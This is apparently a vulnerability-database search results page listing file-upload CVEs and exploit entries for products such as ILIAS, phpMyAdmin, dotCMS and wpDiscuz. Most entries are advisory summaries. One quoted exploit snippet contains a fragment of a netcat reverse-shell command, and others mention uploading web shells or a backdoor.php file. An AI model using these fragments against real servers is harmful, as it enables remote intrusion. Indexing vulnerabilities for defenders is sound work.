Lucene search

299 matches found

Cvelist
added 2024/05/24 2:6 p.m. · 20 views

CVE-2024-35592

An arbitrary file upload vulnerability in the Upload function of Box-IM v2.0 allows attackers to execute arbitrary code via uploading a crafted PDF file...

7.4 AI score · 0.00563 EPSS
Exploits 0 · References 1

OSV
added 2024/05/21 3:15 p.m. · 1 views

CVE-2024-33529

ILIAS 7 before 7.30 and ILIAS 8 before 8.11 as well as ILIAS 9.0 allow remote authenticated attackers with administrative privileges to execute operating system commands via file uploads with dangerous types...

7.2 CVSS · 7.5 AI score
Exploits 0 · References 2

Positive Technologies
added 2024/05/15 12:0 a.m. · 3 views

PT-2024-3651 · D Link · D-Link Dar-7000-40 +2

Name of the Vulnerable Software and Affected Versions: D-Link DAR-7000-40 version V31R02B1413C; D-Link DAR-7000 (affected versions not specified); D-Link DAR-8000 (affected versions not specified). Description: A critical vulnerability was found in the D-Link DAR-7000 and DAR-8000 routers, affecting an...

9.8 CVSS · 6.4 AI score · 0.02311 EPSS
Exploits 0 · References 10

OSV
added 2024/01/25 12:15 p.m. · 10 views

CVE-2023-6282

IceHrm 23.0.0.OS does not sufficiently encode user-controlled input, which creates a Cross-Site Scripting (XSS) vulnerability via /icehrm/app/fileuploadpage.php, in multiple parameters. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload and partially...

6.1 CVSS · 5.7 AI score
Exploits 0 · References 1

0day.today
added 2023/11/30 12:0 a.m. · 543 views

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

7.5 CVSS · 7.4 AI score · 0.00512 EPSS
Exploits 4

Packet Storm
added 2023/07/12 12:0 a.m. · 340 views

Architect HTML And Site Builder 2.2.3 File Upload

Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability | Author : indoushka | Tested on : windows 10 Français V.Pro / browser :...

7.1 AI score
Exploits 0

0day.today
added 2023/05/05 12:0 a.m. · 241 views

Online Pizza Ordering System v1.0 - Unauthenticated File Upload Exploit

Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload Exploit Author: URGAN Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html Software Link:...

9.8 CVSS · 9.7 AI score · 0.03624 EPSS
Exploits 4

Vulnrichment
added 2023/04/05 12:0 a.m. · 8 views

CVE-2023-0670

Ulearn version a5a7ca20de859051ea0470542844980a66dfc05d allows an attacker with administrator permissions to obtain remote code execution on the server through the image upload functionality. This occurs because the application does not validate that the uploaded image is actually an image...

7.8 AI score · 0.01018 EPSS
Exploits 0 · References 1

Vulnrichment
added 2023/03/21 11:48 p.m. · 6 views

CVE-2023-27855 Rockwell Automation ThinManager ThinServer Path Traversal Upload

In affected versions, a path traversal exists when processing a message in Rockwell Automation's ThinManager ThinServer. An unauthenticated remote attacker could potentially exploit this vulnerability to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed...

9.8 CVSS · 9.8 AI score · 0.13226 EPSS
Exploits 1 · References 1

Vulnrichment
added 2023/02/13 12:0 a.m. · 5 views

CVE-2023-25727

In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface...

5.8 AI score · 0.01163 EPSS
Exploits 0 · References 1

Vulnrichment
added 2023/02/03 12:0 a.m. · 3 views

CVE-2021-36426

File Upload vulnerability in phpwcms 1.9.25 allows remote attackers to run arbitrary code via crafted file upload to include/inclib/general.inc.php...

7.8 AI score · 0.01058 EPSS
Exploits 1 · References 1

wpexploit
added 2022/12/29 12:0 a.m. · 156 views

Multiple themes - Unauthenticated Arbitrary File Upload

Multiple themes from ChimpStudio and PixFill do not have any authorisation and upload validation in the langupload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server. Create a malicious file "backdoor.php", then curl...

9.8 CVSS · 1.4 AI score · 0.02084 EPSS
Exploits 12

Vulnrichment
added 2022/07/17 9:54 p.m. · 10 views

CVE-2022-26352

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous...

7.9 AI score · 0.91501 EPSS
Exploits 4 · References 2

Github Security Blog
added 2022/05/17 4:43 a.m. · 14 views

TYPO3 doesn't properly check file extensions

The (1) file upload component and (2) File Abstraction Layer (FAL) in TYPO3 6.0.x before 6.0.8 and 6.1.x before 6.1.3 do not properly check file extensions, which allow remote authenticated editors to execute arbitrary PHP code by uploading a .php file...

6.5 CVSS · 7.4 AI score · 0.01151 EPSS
Exploits 0 · References 3 · Affected Software 1

0day.today
added 2022/04/08 12:0 a.m. · 437 views

Social Codia SMS 1 Shell Upload Exploit

sms-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description - Upload web shell at avatar teacher in admin panel Steps to Reproduce Login to admin - Teacher - Add Teacher - upload web shell at avatar teacher - Add Teacher Exploit Upload web shell at avatar teacher When upload success acce...

7.2 CVSS · 0.2 AI score · 0.02367 EPSS
Exploits 3

Vulnrichment
added 2022/01/04 8:40 p.m. · 4 views

CVE-2022-21650 Stored XSS via html file upload in convos

Convos is an open source multi-user chat that runs in a web browser. You can't use SVG extension in Convos' chat window, but you can upload a file with an .html extension. By uploading an SVG file with an html extension the upload filter can be bypassed. This causes Stored XSS. Also, after...

7.6 CVSS · 7.2 AI score · 0.00831 EPSS
Exploits 1 · References 4

CNVD
added 2021/10/11 12:0 a.m. · 5 views

Tad Web Authorization Issues Vulnerability

Tad Web is a multiplayer web module by the individual developer of Tad in Taiwan, China. An authorization issue vulnerability exists in Tad Web, which can be exploited by attackers to view announcements and upload files without logging in...

6.5 CVSS · 6.8 AI score · 0.00992 EPSS
Exploits 0 · References 1

0day.today
added 2021/09/22 12:0 a.m. · 174 views

Online Reviewer System 1.0 - Remote Code Execution (Unauthenticated) Exploit

Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Exploit Author: Abdullah Khawaja Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html Software Link:...

0.7 AI score
Exploits 0

NVD
added 2021/08/16 2:15 p.m. · 12 views

CVE-2021-38753

An unrestricted file upload on Simple Image Gallery Web App can be exploited to upload a web shell and executed to gain unauthorized access to the server hosting the web app...

9.8 CVSS · 0.0146 EPSS
Exploits 1 · References 1

0day.today
added 2021/06/28 12:0 a.m. · 395 views

WordPress wpDiscuz 7.0.4 Shell Upload Exploit

This Metasploit module exploits an arbitrary file upload in the WordPress wpDiscuz plugin versions from 7.0.0 through 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable server. This module...

10 CVSS · 0.6 AI score · 0.94616 EPSS
Exploits 18